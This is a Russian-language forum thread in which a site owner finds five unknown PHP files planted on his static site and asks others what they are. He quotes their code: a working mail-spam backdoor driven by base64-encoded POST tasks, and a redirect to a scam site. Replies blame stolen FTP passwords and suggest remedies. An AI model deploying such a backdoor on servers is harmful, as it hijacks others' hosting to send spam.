Неизвестные php файлы нашел в корневой папке
1.
ШЕДЕВР (03.09.2013 / 18:04)
Имеется простой статичный сайт из 1 страницы HTML. Никаких входящих данных. Это просто статичная страница. Недавно зашел залить внутрь сервера пару файлов. Заметил 5 файлов, неизвестного происхождения:
ddubvmr.php
hqdlahg.php
shemubb.php
yhfrhqn.php
yxbmjpw.php
Контент в них одинаковый. Либо в одном из них данный код:
<?php
if (isset($_POST['task']))
{
error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);
$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}
$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
foreach ($x as $arr)
{
echo $arr['to']."\r\n";
$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}
Либо этот локатор:
<?php
header('Location: http://moneevdi.ru/');
?>
Не понятно ЧТО ЭТО и ОТКУДА ЭТО.
Хостер ничего не знает. Видимо чтобы отделаться сказал, что НА САЙТЕ "ДЫРКА"... Но блин сайт статичный из 1-го файла.
Что думаете, может кто либо сталкивался с этим?
Добавлено через 02:28 сек.
Как я понял это какой-то вирус, который использует сайт для отправки спама?
Добавлено через 03:24 сек.
Перейдя по сайту header('Location:
http://moneevdi.ru/'); понял что это какой то развод, сайт-обманка... но как их файлы проникли в мой сервер?
Добавлено через 05:51 сек.
В итоге вышел на сайт
http://www.utrader.com/OpenAccount/?campaign=726 .... видимо это просто реферал для получения %... но как найти ту "дыру" по которой забросили этот файл.
могли ли весь хостинг взломать? то есть не через мой сайт, а через соседний, после чего закинули такой файл всем тем у кого есть активные сайты
2.
николай (03.09.2013 / 18:20)
комп на вирусы проверь. была подобная ситуация.только в каждый индекс добавлялся код.
3.
ШЕДЕВР (03.09.2013 / 18:25)
кстати. заметил что такое на ВСЕХ сайтах моих. и не важно в каких это хостингах. может на компе вирус и он подбирал пароли через тотал командер
2, проверяю. каждый день. у меня касперский активен с лицензией. он даже не пикнул.
4.
Neformat (03.09.2013 / 18:56)
Не хрен хранить пароли FTP на менеджерах и вообще на компе в открытом виде. Меняй все пароли, ставь другой FTP менеджер. Проверяй комп на вирусы, например доктор вебом.
5.
ШЕДЕВР (03.09.2013 / 19:18)
Я 6 лет так хранил и было ок. Сейчас тотал командер у меня. Какой посоветуете?
6.
Zдешний (03.09.2013 / 19:24)
Filezilla FTP Client
7.
Кевин Митник (03.09.2013 / 20:30)
#6 однозначно!
8.
Станислав Крунич (03.09.2013 / 20:38)
В любом FTP клиенте и IDE хранить пароли НЕЛЬЗЯ!
KeepaSS! И только
URL:
https://visavi.net/topics/38857